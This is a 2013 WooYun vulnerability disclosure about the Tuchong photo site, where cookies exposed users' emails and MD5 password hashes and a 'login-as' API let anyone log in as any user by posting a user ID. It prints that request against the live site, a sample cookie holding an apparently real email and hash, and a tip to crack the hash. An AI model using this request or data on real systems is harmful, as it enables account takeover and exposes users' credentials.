当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023777

漏洞标题:图虫网主站泄露用户邮箱、用户密码 16W用户告急

相关厂商:图虫网

漏洞作者: 猪猪侠

提交时间:2013-05-15 14:28

修复时间:2013-06-29 14:28

公开时间:2013-06-29 14:28

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-15: 细节已通知厂商并且等待厂商处理中
2013-05-15: 厂商已经确认,细节仅向厂商公开
2013-05-25: 细节向核心白帽子及相关领域专家公开
2013-06-04: 细节向普通白帽子公开
2013-06-14: 细节向实习白帽子公开
2013-06-29: 细节向公众公开

简要描述:

图虫网系统的API,在输出用户信息时未进行严格的业务逻辑设计,直接输出了用户的邮箱、用户名、用户密码、用户登录IP等敏感信息。

详细说明:

http://tuchong.com/
浏览器栏输入:javascript:document.cookie;
email为登录用户名,password为加密过的md5密文,可cmd5解密

PHPSESSID=9ao9jt8itjdpc68n8umv54f5o7; email=61320%40qq.com; storage=334854; password=fbb204a4061ffbd41284a84c258c1bfb; site=qq; __utma=115147160.2072187565.1368596767.1368596767.1368596767.1; __utmb=1151471601368596767; __utmc=115147160; __utmz=115147160.1368596767.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


下图为某个跨站直接跨到后台,这个登录功能可以模拟任意用户登录前台,节操!

.jpg

漏洞证明:

登录了Webmaster的前台,ID=1

.jpg


http://tuchong.com/api/account/login-as/
POST: userId=1


登录接口,POST ID就行,到前台后,又可以看Webmaster的Cookie哦~~

修复方案:

不该输出的信息还是尽量不要输出。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-05-15 15:53

厂商回复:

不应该输出password_md5,嗯。
图虫正在做新版,老版是2年前的代码,漏洞很多,请各位大侠高抬贵手啊,放过小弟吧。。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-05-15 14:34 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

    马克

  2. 2013-05-15 14:41 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @猪猪侠 WooYun: 图虫网整站数据库可泄露15W+用户 才多久,用户多了1W+

  3. 2013-05-15 14:47 | xcloud ( 路人 | Rank:6 漏洞数:1 | 我要奖品。)

    密码明文?

  4. 2013-06-04 21:03 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser this ia a Zend 0day ~!